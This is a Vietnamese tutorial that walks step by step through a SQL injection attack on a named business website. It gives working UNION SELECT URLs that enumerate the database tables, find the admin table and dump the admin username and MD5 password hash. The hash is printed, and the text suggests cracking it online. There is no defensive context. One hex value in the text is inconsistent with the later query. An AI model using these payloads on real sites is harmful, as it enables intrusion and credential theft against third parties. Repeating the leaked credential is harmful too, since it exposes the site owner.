Ví Dụ : http://duythinh.com.vn/?do=product&id=7
* Bước 2 : Ta Thêm Dấu ' Vào sau là sẽ được http://duythinh.com.vn/?do=product&id=7'
* Bước 3 : Ta Sẽ Thấy Sites Bị Lỗi Sẽ Thay Đổi Giao Diện .
* Bước 4 : Ta Sẽ Thêm Câu Lệnh Sau Vào " order by " Sẽ Được Như Sau :
http://duythinh.com.vn/?do=product&id=7+order+by+1--
- Sau Đó Ta Sẽ Thấy Sites Sẽ Bình Thường Và Sau Đó Ta Chỉ Cần Tăng Dần lên 2 , 3 , 4 ,.... 10 Khi Tới " Order By 10 " Sẽ thấy Sites Đổi Giao Diện và Ta Sẽ Lùi Đi Từ Từ Xuống "order by 9 " Sẽ Thấy Sites Trở Lại Bình Thường . Và Ta Xác Định Được Số " column " Là "9 "
* Bước 5 : Ta Sẽ Thay " order by 9 " Thành " UNION SELECT 1,2,3,4,5,6,7,8,9-- " Ta Sẽ Được : http://duythinh.com.vn/?do=product&id=7+UNION+SELECT+1,2,3,4,5,6,7,8,9--
- Sau Đó Ta Phải Xác Định Xem Cột lỗi Ở Đây Là Mấy . Theo Mình Thấy Thì Các Bạn Đã Quen Rồi Thì Sẽ Tìm Ra Cột Lỗi . Ở Đây Bị Lỗi Ở Cột 5 , 7 .
* Bước 6 : Ta chọn cột 5 hay 7 đều được tùy vào số cột lỗi ......
- Ở Đâu Mình Chọn Cột 5 . Thay cột 5 bằng câu truy lệnh : "group_concat(table_name) "
- Và Thêm Câu Truy Lệnh Ở cuối : " from information_schema.tables where table_schema=database() "
- Lệnh Như Sau : http://duythinh.com.vn/?do=product&id=7+UNION+SELECT+1,2,3,4,group_concat(table_name),6,7,8,9+from+information_schema.tables+where+table_schema=database()--
- Sau Khi Khai Được Sẽ Ra Bảng Table Như Sau : " orderdetail,orders,procate,product,tt_admin,tt_careers,tt_flash,tt_info1,tt_introduction,tt_links,tt_partners "
* Bước 7 : Ở Bảng Table Trên Bạn Phải Xác Định Được Cái Nào Là Chứa User VàPassword Admin .
- Ở Trên Ta Có Thể Thấy Được Table Admin Là : " tt_admin "
- Ta Sẽ Thêm Câu Lệnh Truy vấn Như Sau : " and table_name=0x747461646d696e "
- Ở Trên Cái Hex " 747461646d696e " Là : tt_admin .
- Sẽ Đổi table = column , tables = columns.
- Sẽ Được Như Sau : http://duythinh.com.vn/?do=product&id=7+UNION+SELECT+1,2,3,4,group_concat(column_name),6,7,8,9+from+information_schema.columns+where+table_schema=database()+and+table_name=0x74745f61646d696e--
* Bước 8 : Nó sẽ Xuất Hiện 1 dãy table : " id,username,password,email,right "
- Và Ta Đã Xác Định Được : " username + password " Chính Là Của Admin
- Ta Xóa câu truy vấn " from information ..... đến hết và Thay = Câu Lệnh : " from tt_admin "
- Và Thay " column_name = username,0x2f,password "
- Câu Lệnh Của Ta Sẽ Được Như Sau : http://duythinh.com.vn/?do=product&id=7+UNION+SELECT+1,2,3,4,group_concat(username,0x2f,password),6,7,8,9+from+tt_admin--
- Ta Đã Ra Được " user+password " : " duythinh/253b566ad31536efa0dcd5b5fb284ab5"
- Trong Đó :
# username : duythinh
# password : 253b566ad31536efa0dcd5b5fb284ab5
- Ở Đây Ta Có Thể Dùng Tool Online Để Crack Pass md5 .
********************** The End *********************
